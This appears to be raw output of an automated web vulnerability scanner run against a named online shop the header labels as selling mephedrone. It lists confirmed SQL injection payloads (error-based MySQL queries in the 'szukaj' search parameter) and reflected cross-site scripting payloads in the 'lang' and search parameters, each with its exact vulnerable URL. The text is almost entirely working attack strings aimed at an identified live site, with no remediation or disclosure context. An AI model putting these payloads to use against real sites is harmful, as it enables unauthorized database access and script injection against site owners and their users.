rc-chemicals.sk - mefedron sklep

1. * SQL Injection
2.  
3. Severity : Critical
4. Confirmation : Confirmed
5. Vulnerable URL : http://rc-chemicals.sk/pl,szukaj
6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
7. Parameter Name: szukaj
8. Parameter Type: Post
9. Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="
10.  
11. Severity : Critical
12. Confirmation : Confirmed
13. Vulnerable URL : http://rc-chemicals.sk/en,szukaj
14. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
15. Parameter Name: szukaj
16. Parameter Type: Post
17. Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="
18.  
19. * [High Possibility] SQL Injection
20.  
21. Severity : Critical
22. Confirmation : Confirmed
23. Vulnerable URL : http://rc-chemicals.sk/pl,szukaj
24. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
25. Parameter Name: szukaj
26. Parameter Type: Post
27. Attack Pattern: "+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+"
28.  
29. Severity : Critical
30. Confirmation : Confirmed
31. Vulnerable URL : http://rc-chemicals.sk/en,szukaj
32. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
33. Parameter Name: szukaj
34. Parameter Type: Post
35. Attack Pattern: "+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+"
36.  
37. * XSS (Cross-site Scripting)
38.  
39. Severity : Important
40. Confirmation : Confirmed
41. Vulnerable URL : http://rc-chemicals.sk/index.php?lang='"--></style></script><script>alert(0x0009BE)</script>&page=2
42. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
43. Parameter Name: lang
44. Parameter Type: Querystring
45. Attack Pattern: '"--></style></script><script>alert(0x0009BE)</script>
46.  
47. Severity : Important
48. Confirmation : Confirmed
49. Detection Accuracy :
50. Vulnerable URL : http://rc-chemicals.sk/index.php?lang='"--></style></script><script>alert(0x000BE5)</script>&page=3
51. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
52. Parameter Name: lang
53. Parameter Type: Querystring
54. Attack Pattern: '"--></style></script><script>alert(0x000BE5)</script>
55.  
56. Severity : Important
57. Confirmation : Confirmed
58. Detection Accuracy :
59. Vulnerable URL : http://rc-chemicals.sk/pl,szukaj
60. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
61. Parameter Name: szukaj
62. Parameter Type: Post
63. Attack Pattern: '"--></style></script><script>alert(0x000D2B)</script>
64.  
65. Severity : Important
66. Confirmation : Confirmed
67. Vulnerable URL : http://rc-chemicals.sk/en,szukaj
68. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
69. Parameter Name: szukaj
70. Parameter Type: Post
71. Attack Pattern: '"--></style></script><script>alert(0x001071)</script>
72.  
73. * MySQL Database Identified
74.  
75. Severity : Information
76. Confirmation : Confirmed
77. Vulnerable URL : http://rc-chemicals.sk/pl,szukaj
78. Vulnerability Classifications: -
79. Parameter Name: szukaj
80. Parameter Type: Post
81. Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="